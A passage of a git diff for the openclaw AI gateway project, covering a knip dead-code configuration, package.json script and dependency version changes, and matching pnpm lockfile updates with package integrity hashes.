+ "src/agents/pi-auth-json.ts", + "src/agents/tool-policy.conformance.ts", + "src/auto-reply/reply/audio-tags.ts", + "src/gateway/live-tool-probe-utils.ts", + "src/gateway/server.auth.shared.ts", + "src/shared/text/assistant-visible-text.ts", + "src/telegram/bot/reply-threading.ts", + "src/telegram/draft-chunking.ts", + "extensions/msteams/src/conversation-store-memory.ts", + "extensions/msteams/src/polls-store-memory.ts", + "extensions/voice-call/src/providers/index.ts", + "extensions/voice-call/src/providers/tts-openai.ts", + ], + workspaces: { + ".": { + entry: rootEntries, + project: [ + "src/**/*.ts!", + "scripts/**/*.{js,mjs,cjs,ts,mts,cts}!", + "*.config.{js,mjs,cjs,ts,mts,cts}!", + "*.mjs!", + ], + }, + ui: { + entry: ["index.html!", "src/main.ts!", "vite.config.ts!", "vitest*.ts!"], + project: ["src/**/*.{ts,tsx}!"], + }, + "packages/*": { + entry: ["index.js!", "scripts/postinstall.js!"], + project: ["index.js!", "scripts/**/*.js!"], + }, + "extensions/*": { + entry: ["index.ts!"], + project: ["index.ts!", "src/**/*.ts!"], + ignoreDependencies: ["openclaw"], + }, + }, +} as const; + +export default config; diff --git a/package.json b/package.json index a7b5e189dbc..287456d97be 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "openclaw", - "version": "2026.3.3", + "version": "2026.3.7", "description": "Multi-channel AI gateway with extensible messaging integrations", "keywords": [], "homepage": "https://github.com/openclaw/openclaw#readme", @@ -220,7 +220,7 @@ "android:install": "cd apps/android && ./gradlew :app:installDebug", "android:lint": "cd apps/android && ./gradlew :app:ktlintCheck :benchmark:ktlintCheck", "android:lint:android": "cd apps/android && ./gradlew :app:lintDebug", - "android:run": "cd apps/android && ./gradlew :app:installDebug && adb shell am start -n ai.openclaw.android/.MainActivity", + "android:run": "cd apps/android && ./gradlew :app:installDebug && adb shell am start -n ai.openclaw.app/.MainActivity", "android:test": "cd apps/android && ./gradlew :app:testDebugUnitTest", "android:test:integration": "OPENCLAW_LIVE_TEST=1 OPENCLAW_LIVE_ANDROID_NODE=1 vitest run --config vitest.live.config.ts src/gateway/android-node.capabilities.live.test.ts", "build": "pnpm canvas:a2ui:bundle && tsdown && node scripts/copy-plugin-sdk-root-alias.mjs && pnpm build:plugin-sdk:dts && node --import tsx scripts/write-plugin-sdk-entry-dts.ts && node --import tsx scripts/canvas-a2ui-copy.ts && node --import tsx scripts/copy-hook-metadata.ts && node --import tsx scripts/copy-export-html-templates.ts && node --import tsx scripts/write-build-info.ts && node --import tsx scripts/write-cli-startup-metadata.ts && node --import tsx scripts/write-cli-compat.ts", @@ -231,8 +231,8 @@ "check:docs": "pnpm format:docs:check && pnpm lint:docs && pnpm docs:check-links", "check:host-env-policy:swift": "node scripts/generate-host-env-security-policy-swift.mjs --check", "check:loc": "node --import tsx scripts/check-ts-max-loc.ts --max 500", - "deadcode:ci": "pnpm deadcode:report:ci:knip && pnpm deadcode:report:ci:ts-prune && pnpm deadcode:report:ci:ts-unused", - "deadcode:knip": "pnpm dlx knip --no-progress", + "deadcode:ci": "pnpm deadcode:report:ci:knip", + "deadcode:knip": "pnpm dlx knip --config knip.config.ts --isolate-workspaces --production --no-progress --reporter compact --files --dependencies", "deadcode:report": "pnpm deadcode:knip; pnpm deadcode:ts-prune; pnpm deadcode:ts-unused", "deadcode:report:ci:knip": "mkdir -p .artifacts/deadcode && pnpm deadcode:knip > .artifacts/deadcode/knip.txt 2>&1 || true", "deadcode:report:ci:ts-prune": "mkdir -p .artifacts/deadcode && pnpm deadcode:ts-prune > .artifacts/deadcode/ts-prune.txt 2>&1 || true", @@ -246,6 +246,8 @@ "docs:list": "node scripts/docs-list.js", "docs:spellcheck": "bash scripts/docs-spellcheck.sh", "docs:spellcheck:fix": "bash scripts/docs-spellcheck.sh --write", + "dup:check": "jscpd src extensions test scripts --format typescript,javascript --pattern \"**/*.{ts,tsx,js,mjs,cjs}\" --gitignore --noSymlinks --ignore \"**/node_modules/**,**/dist/**,**/.git/**,**/coverage/**,**/build/**,**/.build/**,**/.artifacts/**\" --min-lines 12 --min-tokens 80 --reporters console", + "dup:check:json": "jscpd src extensions test scripts --format typescript,javascript --pattern \"**/*.{ts,tsx,js,mjs,cjs}\" --gitignore --noSymlinks --ignore \"**/node_modules/**,**/dist/**,**/.git/**,**/coverage/**,**/build/**,**/.build/**,**/.artifacts/**\" --min-lines 12 --min-tokens 80 --reporters json --output .artifacts/jscpd", "format": "oxfmt --write", "format:all": "pnpm format && pnpm format:swift", "format:check": "oxfmt --check", @@ -330,10 +332,10 @@ "ui:install": "node scripts/ui.js install" }, "dependencies": { - "@agentclientprotocol/sdk": "0.14.1", - "@aws-sdk/client-bedrock": "^3.1000.0", + "@agentclientprotocol/sdk": "0.15.0", + "@aws-sdk/client-bedrock": "^3.1004.0", "@buape/carbon": "0.0.0-beta-20260216184201", - "@clack/prompts": "^1.0.1", + "@clack/prompts": "^1.1.0", "@discordjs/voice": "^0.19.0", "@grammyjs/runner": "^2.0.3", "@grammyjs/transformer-throttler": "^1.2.1", @@ -348,7 +350,6 @@ "@sinclair/typebox": "0.34.48", "@slack/bolt": "^4.6.0", "@slack/web-api": "^7.14.1", - "@snazzah/davey": "^0.1.9", "@whiskeysockets/baileys": "7.0.0-rc.9", "ajv": "^8.18.0", "chalk": "^5.6.2", @@ -356,21 +357,18 @@ "cli-highlight": "^2.1.11", "commander": "^14.0.3", "croner": "^10.0.1", - "discord-api-types": "^0.38.40", + "discord-api-types": "^0.38.41", "dotenv": "^17.3.1", "express": "^5.2.1", "file-type": "^21.3.0", - "gaxios": "7.1.3", - "grammy": "^1.41.0", + "grammy": "^1.41.1", "https-proxy-agent": "^7.0.6", "ipaddr.js": "^2.3.0", "jiti": "^2.6.1", "json5": "^2.2.3", "jszip": "^3.10.1", "linkedom": "^0.18.12", - "long": "^5.3.2", "markdown-it": "^14.1.1", - "node-domexception": "npm:@nolyfill/domexception@^1.0.28", "node-edge-tts": "^1.2.10", "opusscript": "^0.1.1", "osc-progress": "^0.3.0", @@ -379,7 +377,6 @@ "qrcode-terminal": "^0.12.0", "sharp": "^0.34.5", "sqlite-vec": "0.1.7-alpha.2", - "strip-ansi": "^7.2.0", "tar": "7.5.10", "tslog": "^4.10.2", "undici": "^7.22.0", @@ -393,17 +390,18 @@ "@lit/context": "^1.1.6", "@types/express": "^5.0.6", "@types/markdown-it": "^14.1.2", - "@types/node": "^25.3.3", + "@types/node": "^25.3.5", "@types/qrcode-terminal": "^0.12.2", "@types/ws": "^8.18.1", - "@typescript/native-preview": "7.0.0-dev.20260301.1", + "@typescript/native-preview": "7.0.0-dev.20260307.1", "@vitest/coverage-v8": "^4.0.18", + "jscpd": "4.0.8", "lit": "^3.3.2", - "oxfmt": "0.35.0", - "oxlint": "^1.50.0", - "oxlint-tsgolint": "^0.15.0", + "oxfmt": "0.36.0", + "oxlint": "^1.51.0", + "oxlint-tsgolint": "^0.16.0", "signal-utils": "0.21.1", - "tsdown": "0.21.0-beta.2", + "tsdown": "0.21.0", "tsx": "^4.21.0", "typescript": "^5.9.3", "vitest": "^4.0.18" diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index 79313de6f9f..0dee1e3ba6f 100644 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -23,26 +23,26 @@ importers: .: dependencies: '@agentclientprotocol/sdk': - specifier: 0.14.1 - version: 0.14.1(zod@4.3.6) + specifier: 0.15.0 + version: 0.15.0(zod@4.3.6) '@aws-sdk/client-bedrock': - specifier: ^3.1000.0 - version: 3.1000.0 + specifier: ^3.1004.0 + version: 3.1004.0 '@buape/carbon': specifier: 0.0.0-beta-20260216184201 version: 0.0.0-beta-20260216184201(@discordjs/opus@0.10.0)(hono@4.12.5)(opusscript@0.1.1) '@clack/prompts': - specifier: ^1.0.1 - version: 1.0.1 + specifier: ^1.1.0 + version: 1.1.0 '@discordjs/voice': specifier: ^0.19.0 version: 0.19.0(@discordjs/opus@0.10.0)(opusscript@0.1.1) '@grammyjs/runner': specifier: ^2.0.3 - version: 2.0.3(grammy@1.41.0) + version: 2.0.3(grammy@1.41.1) '@grammyjs/transformer-throttler': specifier: ^1.2.1 - version: 1.2.1(grammy@1.41.0) + version: 1.2.1(grammy@1.41.1) '@homebridge/ciao': specifier: ^1.3.5 version: 1.3.5 @@ -79,9 +79,6 @@ importers: '@slack/web-api': specifier: ^7.14.1 version: 7.14.1 - '@snazzah/davey': - specifier: ^0.1.9 - version: 0.1.9 '@whiskeysockets/baileys': specifier: 7.0.0-rc.9 version: 7.0.0-rc.9(audio-decode@2.2.3)(sharp@0.34.5) @@ -104,8 +101,8 @@ importers: specifier: ^10.0.1 version: 10.0.1 discord-api-types: - specifier: ^0.38.40 - version: 0.38.40 + specifier: ^0.38.41 + version: 0.38.41 dotenv: specifier: ^17.3.1 version: 17.3.1 @@ -115,12 +112,9 @@ importers: file-type: specifier: ^21.3.0 version: 21.3.0 - gaxios: - specifier: 7.1.3 - version: 7.1.3 grammy: - specifier: ^1.41.0 - version: 1.41.0 + specifier: ^1.41.1 + version: 1.41.1 https-proxy-agent: specifier: ^7.0.6 version: 7.0.6 @@ -139,15 +133,9 @@ importers: linkedom: specifier: ^0.18.12 version: 0.18.12 - long: - specifier: ^5.3.2 - version: 5.3.2 markdown-it: specifier: ^14.1.1 version: 14.1.1 - node-domexception: - specifier: npm:@nolyfill/domexception@^1.0.28 - version: '@nolyfill/domexception@1.0.28' node-edge-tts: specifier: ^1.2.10 version: 1.2.10 @@ -175,9 +163,6 @@ importers: sqlite-vec: specifier: 0.1.7-alpha.2 version: 0.1.7-alpha.2 - strip-ansi: - specifier: ^7.2.0 - version: 7.2.0 tar: specifier: 7.5.10 version: 7.5.10 @@ -213,8 +198,8 @@ importers: specifier: ^14.1.2 version: 14.1.2 '@types/node': - specifier: ^25.3.3 - version: 25.3.3 + specifier: ^25.3.5 + version: 25.3.5 '@types/qrcode-terminal': specifier: ^0.12.2 version: 0.12.2 @@ -222,29 +207,32 @@ importers: specifier: ^8.18.1 version: 8.18.1 '@typescript/native-preview': - specifier: 7.0.0-dev.20260301.1 - version: 7.0.0-dev.20260301.1 + specifier: 7.0.0-dev.20260307.1 + version: 7.0.0-dev.20260307.1 '@vitest/coverage-v8': specifier: ^4.0.18 - version: 4.0.18(@vitest/browser@4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18))(vitest@4.0.18) + version: 4.0.18(@vitest/browser@4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18))(vitest@4.0.18) + jscpd: + specifier: 4.0.8 + version: 4.0.8 lit: specifier: ^3.3.2 version: 3.3.2 oxfmt: - specifier: 0.35.0 - version: 0.35.0 + specifier: 0.36.0 + version: 0.36.0 oxlint: - specifier: ^1.50.0 - version: 1.50.0(oxlint-tsgolint@0.15.0) + specifier: ^1.51.0 + version: 1.51.0(oxlint-tsgolint@0.16.0) oxlint-tsgolint: - specifier: ^0.15.0 - version: 0.15.0 + specifier: ^0.16.0 + version: 0.16.0 signal-utils: specifier: 0.21.1 version: 0.21.1(signal-polyfill@0.2.2) tsdown: - specifier: 0.21.0-beta.2 - version: 0.21.0-beta.2(@typescript/native-preview@7.0.0-dev.20260301.1)(typescript@5.9.3) + specifier: 0.21.0 + version: 0.21.0(@typescript/native-preview@7.0.0-dev.20260307.1)(typescript@5.9.3) tsx: specifier: ^4.21.0 version: 4.21.0 @@ -253,7 +241,7 @@ importers: version: 5.9.3 vitest: specifier: ^4.0.18 - version: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.3)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + version: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.5)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) extensions/acpx: dependencies: @@ -275,32 +263,32 @@ importers: specifier: ^1.9.0 version: 1.9.0 '@opentelemetry/api-logs': - specifier: ^0.212.0 - version: 0.212.0 + specifier: ^0.213.0 + version: 0.213.0 '@opentelemetry/exporter-logs-otlp-proto': - specifier: ^0.212.0 - version: 0.212.0(@opentelemetry/api@1.9.0) + specifier: ^0.213.0 + version: 0.213.0(@opentelemetry/api@1.9.0) '@opentelemetry/exporter-metrics-otlp-proto': - specifier: ^0.212.0 - version: 0.212.0(@opentelemetry/api@1.9.0) + specifier: ^0.213.0 + version: 0.213.0(@opentelemetry/api@1.9.0) '@opentelemetry/exporter-trace-otlp-proto': - specifier: ^0.212.0 - version: 0.212.0(@opentelemetry/api@1.9.0) + specifier: ^0.213.0 + version: 0.213.0(@opentelemetry/api@1.9.0) '@opentelemetry/resources': - specifier: ^2.5.1 - version: 2.5.1(@opentelemetry/api@1.9.0) + specifier: ^2.6.0 + version: 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/sdk-logs': - specifier: ^0.212.0 - version: 0.212.0(@opentelemetry/api@1.9.0) + specifier: ^0.213.0 + version: 0.213.0(@opentelemetry/api@1.9.0) '@opentelemetry/sdk-metrics': - specifier: ^2.5.1 - version: 2.5.1(@opentelemetry/api@1.9.0) + specifier: ^2.6.0 + version: 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/sdk-node': - specifier: ^0.212.0 - version: 0.212.0(@opentelemetry/api@1.9.0) + specifier: ^0.213.0 + version: 0.213.0(@opentelemetry/api@1.9.0) '@opentelemetry/sdk-trace-base': - specifier: ^2.5.1 - version: 2.5.1(@opentelemetry/api@1.9.0) + specifier: ^2.6.0 + version: 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions': specifier: ^1.40.0 version: 1.40.0 @@ -415,8 +403,8 @@ importers: specifier: 0.34.48 version: 0.34.48 openai: - specifier: ^6.25.0 - version: 6.25.0(ws@8.19.0)(zod@4.3.6) + specifier: ^6.27.0 + version: 6.27.0(ws@8.19.0)(zod@4.3.6) extensions/minimax-portal-auth: {} @@ -461,17 +449,14 @@ importers: extensions/tlon: dependencies: '@tloncorp/api': - specifier: git+https://github.com/tloncorp/api-beta.git#7eede1c1a756977b09f96aa14a92e2b06318ae87 - version: git+https://github.com/tloncorp/api-beta.git#7eede1c1a756977b09f96aa14a92e2b06318ae87 + specifier: github:tloncorp/api-beta#7eede1c1a756977b09f96aa14a92e2b06318ae87 + version: https://codeload.github.com/tloncorp/api-beta/tar.gz/7eede1c1a756977b09f96aa14a92e2b06318ae87 '@tloncorp/tlon-skill': - specifier: 0.1.9 - version: 0.1.9 + specifier: 0.2.2 + version: 0.2.2 '@urbit/aura': specifier: ^3.0.0 version: 3.0.0 - '@urbit/http-api': - specifier: ^3.0.0 - version: 3.0.0 zod: specifier: ^4.3.6 version: 4.3.6 @@ -559,8 +544,8 @@ importers: specifier: ^3.3.2 version: 3.3.2 marked: - specifier: ^17.0.3 - version: 17.0.3 + specifier: ^17.0.4 + version: 17.0.4 signal-polyfill: specifier: ^0.2.2 version: 0.2.2 @@ -569,17 +554,17 @@ importers: version: 0.21.1(signal-polyfill@0.2.2) vite: specifier: 7.3.1 - version: 7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + version: 7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) devDependencies: '@vitest/browser-playwright': specifier: 4.0.18 - version: 4.0.18(playwright@1.58.2)(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) + version: 4.0.18(playwright@1.58.2)(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) playwright: specifier: ^1.58.2 version: 1.58.2 vitest: specifier: 4.0.18 - version: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.3)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + version: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.5)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) packages: @@ -588,6 +573,11 @@ packages: peerDependencies: zod: ^3.25.0 || ^4.0.0 + '@agentclientprotocol/sdk@0.15.0': + resolution: {integrity: sha512-TH4utu23Ix8ec34srBHmDD4p3HI0cYleS1jN9lghRczPfhFlMBNrQgZWeBBe12DWy27L11eIrtciY2MXFSEiDg==} + peerDependencies: + zod: ^3.25.0 || ^4.0.0 + '@anthropic-ai/sdk@0.73.0': resolution: {integrity: sha512-URURVzhxXGJDGUGFunIOtBlSl7KWvZiAAKY/ttTkZAkXT9bTPqdk2eK0b8qqSxXpikh3QKPnPYpiyX98zf5ebw==} hasBin: true @@ -628,6 +618,10 @@ packages: resolution: {integrity: sha512-wGU8uJXrPW/hZuHdPNVe1kAFIBiKcslBcoDBN0eYBzS13um8p5jJiQJ9WsD1nSpKCmyx7qZXc6xjcbIQPyOrrA==} engines: {node: '>=20.0.0'} + '@aws-sdk/client-bedrock@3.1004.0': + resolution: {integrity: sha512-JbfZSV85IL+43S7rPBmeMbvoOYXs1wmrfbEpHkDBjkvbukRQWtoetiPAXNSKDfFq1qVsoq8sWPdoerDQwlUO8w==} + engines: {node: '>=20.0.0'} + '@aws-sdk/client-s3@3.1000.0': resolution: {integrity: sha512-7kPy33qNGq3NfwHC0412T6LDK1bp4+eiPzetX0sVd9cpTSXuQDKpoOFnB0Njj6uZjJDcLS3n2OeyarwwgkQ0Ow==} engines: {node: '>=20.0.0'} @@ -636,6 +630,10 @@ packages: resolution: {integrity: sha512-AlC0oQ1/mdJ8vCIqu524j5RB7M8i8E24bbkZmya1CuiQxkY7SdIZAyw7NDNMGaNINQFq/8oGRMX0HeOfCVsl/A==} engines: {node: '>=20.0.0'} + '@aws-sdk/core@3.973.18': + resolution: {integrity: sha512-GUIlegfcK2LO1J2Y98sCJy63rQSiLiDOgVw7HiHPRqfI2vb3XozTVqemwO0VSGXp54ngCnAQz0Lf0YPCBINNxA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/crc64-nvme@3.972.3': resolution: {integrity: sha512-UExeK+EFiq5LAcbHm96CQLSia+5pvpUVSAsVApscBzayb7/6dJBJKwV4/onsk4VbWSmqxDMcfuTD+pC4RxgZHg==} engines: {node: '>=20.0.0'} @@ -644,34 +642,66 @@ packages: resolution: {integrity: sha512-6ljXKIQ22WFKyIs1jbORIkGanySBHaPPTOI4OxACP5WXgbcR0nDYfqNJfXEGwCK7IzHdNbCSFsNKKs0qCexR8Q==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-env@3.972.16': + resolution: {integrity: sha512-HrdtnadvTGAQUr18sPzGlE5El3ICphnH6SU7UQOMOWFgRKbTRNN8msTxM4emzguUso9CzaHU2xy5ctSrmK5YNA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-http@3.972.15': resolution: {integrity: sha512-dJuSTreu/T8f24SHDNTjd7eQ4rabr0TzPh2UTCwYexQtzG3nTDKm1e5eIdhiroTMDkPEJeY+WPkA6F9wod/20A==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-http@3.972.18': + resolution: {integrity: sha512-NyB6smuZAixND5jZumkpkunQ0voc4Mwgkd+SZ6cvAzIB7gK8HV8Zd4rS8Kn5MmoGgusyNfVGG+RLoYc4yFiw+A==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-ini@3.972.13': resolution: {integrity: sha512-JKSoGb7XeabZLBJptpqoZIFbROUIS65NuQnEHGOpuT9GuuZwag2qciKANiDLFiYk4u8nSrJC9JIOnWKVvPVjeA==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-ini@3.972.17': + resolution: {integrity: sha512-dFqh7nfX43B8dO1aPQHOcjC0SnCJ83H3F+1LoCh3X1P7E7N09I+0/taID0asU6GCddfDExqnEvQtDdkuMe5tKQ==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-login@3.972.13': resolution: {integrity: sha512-RtYcrxdnJHKY8MFQGLltCURcjuMjnaQpAxPE6+/QEdDHHItMKZgabRe/KScX737F9vJMQsmJy9EmMOkCnoC1JQ==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-login@3.972.17': + resolution: {integrity: sha512-gf2E5b7LpKb+JX2oQsRIDxdRZjBFZt2olCGlWCdb3vBERbXIPgm2t1R5mEnwd4j0UEO/Tbg5zN2KJbHXttJqwA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-node@3.972.14': resolution: {integrity: sha512-WqoC2aliIjQM/L3oFf6j+op/enT2i9Cc4UTxxMEKrJNECkq4/PlKE5BOjSYFcq6G9mz65EFbXJh7zOU4CvjSKQ==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-node@3.972.18': + resolution: {integrity: sha512-ZDJa2gd1xiPg/nBDGhUlat02O8obaDEnICBAVS8qieZ0+nDfaB0Z3ec6gjZj27OqFTjnB/Q5a0GwQwb7rMVViw==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-process@3.972.13': resolution: {integrity: sha512-rsRG0LQA4VR+jnDyuqtXi2CePYSmfm5GNL9KxiW8DSe25YwJSr06W8TdUfONAC+rjsTI+aIH2rBGG5FjMeANrw==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-process@3.972.16': + resolution: {integrity: sha512-n89ibATwnLEg0ZdZmUds5bq8AfBAdoYEDpqP3uzPLaRuGelsKlIvCYSNNvfgGLi8NaHPNNhs1HjJZYbqkW9b+g==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-sso@3.972.13': resolution: {integrity: sha512-fr0UU1wx8kNHDhTQBXioc/YviSW8iXuAxHvnH7eQUtn8F8o/FU3uu6EUMvAQgyvn7Ne5QFnC0Cj0BFlwCk+RFw==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-sso@3.972.17': + resolution: {integrity: sha512-wGtte+48xnhnhHMl/MsxzacBPs5A+7JJedjiP452IkHY7vsbYKcvQBqFye8LwdTJVeHtBHv+JFeTscnwepoWGg==} + engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-web-identity@3.972.13': resolution: {integrity: sha512-a6iFMh1pgUH0TdcouBppLJUfPM7Yd3R9S1xFodPtCRoLqCz2RQFA3qjA8x4112PVYXEd4/pHX2eihapq39w0rA==} engines: {node: '>=20.0.0'} + '@aws-sdk/credential-provider-web-identity@3.972.17': + resolution: {integrity: sha512-8aiVJh6fTdl8gcyL+sVNcNwTtWpmoFa1Sh7xlj6Z7L/cZ/tYMEBHq44wTYG8Kt0z/PpGNopD89nbj3FHl9QmTA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/eventstream-handler-node@3.972.9': resolution: {integrity: sha512-mKPiiVssgFDWkAXdEDh8+wpr2pFSX/fBn2onXXnrfIAYbdZhYb4WilKbZ3SJMUnQi+Y48jZMam5J0RrgARluaA==} engines: {node: '>=20.0.0'} @@ -696,6 +726,10 @@ packages: resolution: {integrity: sha512-5XHwjPH1lHB+1q4bfC7T8Z5zZrZXfaLcjSMwTd1HPSPrCmPFMbg3UQ5vgNWcVj0xoX4HWqTGkSf2byrjlnRg5w==} engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-host-header@3.972.7': + resolution: {integrity: sha512-aHQZgztBFEpDU1BB00VWCIIm85JjGjQW1OG9+98BdmaOpguJvzmXBGbnAiYcciCd+IS4e9BEq664lhzGnWJHgQ==} + engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-location-constraint@3.972.6': resolution: {integrity: sha512-XdZ2TLwyj3Am6kvUc67vquQvs6+D8npXvXgyEUJAdkUDx5oMFJKOqpK+UpJhVDsEL068WAJl2NEGzbSik7dGJQ==} engines: {node: '>=20.0.0'} @@ -704,10 +738,18 @@ packages: resolution: {integrity: sha512-iFnaMFMQdljAPrvsCVKYltPt2j40LQqukAbXvW7v0aL5I+1GO7bZ/W8m12WxW3gwyK5p5u1WlHg8TSAizC5cZw==} engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-logger@3.972.7': + resolution: {integrity: sha512-LXhiWlWb26txCU1vcI9PneESSeRp/RYY/McuM4SpdrimQR5NgwaPb4VJCadVeuGWgh6QmqZ6rAKSoL1ob16W6w==} + engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-recursion-detection@3.972.6': resolution: {integrity: sha512-dY4v3of5EEMvik6+UDwQ96KfUFDk8m1oZDdkSc5lwi4o7rFrjnv0A+yTV+gu230iybQZnKgDLg/rt2P3H+Vscw==} engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-recursion-detection@3.972.7': + resolution: {integrity: sha512-l2VQdcBcYLzIzykCHtXlbpiVCZ94/xniLIkAj0jpnpjY4xlgZx7f56Ypn+uV1y3gG0tNVytJqo3K9bfMFee7SQ==} + engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-sdk-s3@3.972.15': resolution: {integrity: sha512-WDLgssevOU5BFx1s8jA7jj6cE5HuImz28sy9jKOaVtz0AW1lYqSzotzdyiybFaBcQTs5zxXOb2pUfyMxgEKY3Q==} engines: {node: '>=20.0.0'} @@ -720,6 +762,10 @@ packages: resolution: {integrity: sha512-ABlFVcIMmuRAwBT+8q5abAxOr7WmaINirDJBnqGY5b5jSDo00UMlg/G4a0xoAgwm6oAECeJcwkvDlxDwKf58fQ==} engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-user-agent@3.972.19': + resolution: {integrity: sha512-Km90fcXt3W/iqujHzuM6IaDkYCj73gsYufcuWXApWdzoTy6KGk8fnchAjePMARU0xegIR3K4N3yIo1vy7OVe8A==} + engines: {node: '>=20.0.0'} + '@aws-sdk/middleware-websocket@3.972.10': resolution: {integrity: sha512-uNqRpbL6djE+XXO4cQ+P8ra37cxNNBP+2IfkVOXu1xFdGMfW+uOTxBQuDPpP43i40PBRBXK5un79l/oYpbzYkA==} engines: {node: '>= 14.0.0'} @@ -728,10 +774,18 @@ packages: resolution: {integrity: sha512-AU5TY1V29xqwg/MxmA2odwysTez+ccFAhmfRJk+QZT5HNv90UTA9qKd1J9THlsQkvmH7HWTEV1lDNxkQO5PzNw==} engines: {node: '>=20.0.0'} + '@aws-sdk/nested-clients@3.996.7': + resolution: {integrity: sha512-MlGWA8uPaOs5AiTZ5JLM4uuWDm9EEAnm9cqwvqQIc6kEgel/8s1BaOWm9QgUcfc9K8qd7KkC3n43yDbeXOA2tg==} + engines: {node: '>=20.0.0'} + '@aws-sdk/region-config-resolver@3.972.6': resolution: {integrity: sha512-Aa5PusHLXAqLTX1UKDvI3pHQJtIsF7Q+3turCHqfz/1F61/zDMWfbTC8evjhrrYVAtz9Vsv3SJ/waSUeu7B6gw==} engines: {node: '>=20.0.0'} + '@aws-sdk/region-config-resolver@3.972.7': + resolution: {integrity: sha512-/Ev/6AI8bvt4HAAptzSjThGUMjcWaX3GX8oERkB0F0F9x2dLSBdgFDiyrRz3i0u0ZFZFQ1b28is4QhyqXTUsVA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/s3-request-presigner@3.1000.0': resolution: {integrity: sha512-DP6EbwCD0CKzBwBnT1X6STB5i+bY765CxjMbWCATDhCgOB343Q6AHM9c1S/300Uc5waXWtI/Wdeak9Ru56JOvg==} engines: {node: '>=20.0.0'} @@ -744,6 +798,10 @@ packages: resolution: {integrity: sha512-eOI+8WPtWpLdlYBGs8OCK3k5uIMUHVsNG3AFO4kaRaZcKReJ/2OO6+2O2Dd/3vTzM56kRjSKe7mBOCwa4PdYqg==} engines: {node: '>=20.0.0'} + '@aws-sdk/token-providers@3.1004.0': + resolution: {integrity: sha512-j9BwZZId9sFp+4GPhf6KrwO8Tben2sXibZA8D1vv2I1zBdvkUHcBA2g4pkqIpTRalMTLC0NPkBPX0gERxfy/iA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/token-providers@3.999.0': resolution: {integrity: sha512-cx0hHUlgXULfykx4rdu/ciNAJaa3AL5xz3rieCz7NKJ68MJwlj3664Y8WR5MGgxfyYJBdamnkjNSx5Kekuc0cg==} engines: {node: '>=20.0.0'} @@ -752,6 +810,10 @@ packages: resolution: {integrity: sha512-RW60aH26Bsc016Y9B98hC0Plx6fK5P2v/iQYwMzrSjiDh1qRMUCP6KrXHYEHe3uFvKiOC93Z9zk4BJsUi6Tj1Q==} engines: {node: '>=20.0.0'} + '@aws-sdk/types@3.973.5': + resolution: {integrity: sha512-hl7BGwDCWsjH8NkZfx+HgS7H2LyM2lTMAI7ba9c8O0KqdBLTdNJivsHpqjg9rNlAlPyREb6DeDRXUl0s8uFdmQ==} + engines: {node: '>=20.0.0'} + '@aws-sdk/util-arn-parser@3.972.2': resolution: {integrity: sha512-VkykWbqMjlSgBFDyrY3nOSqupMc6ivXuGmvci6Q3NnLq5kC+mKQe2QBZ4nrWRE/jqOxeFP2uYzLtwncYYcvQDg==} engines: {node: '>=20.0.0'} @@ -760,6 +822,10 @@ packages: resolution: {integrity: sha512-yWIQSNiCjykLL+ezN5A+DfBb1gfXTytBxm57e64lYmwxDHNmInYHRJYYRAGWG1o77vKEiWaw4ui28e3yb1k5aQ==} engines: {node: '>=20.0.0'} + '@aws-sdk/util-endpoints@3.996.4': + resolution: {integrity: 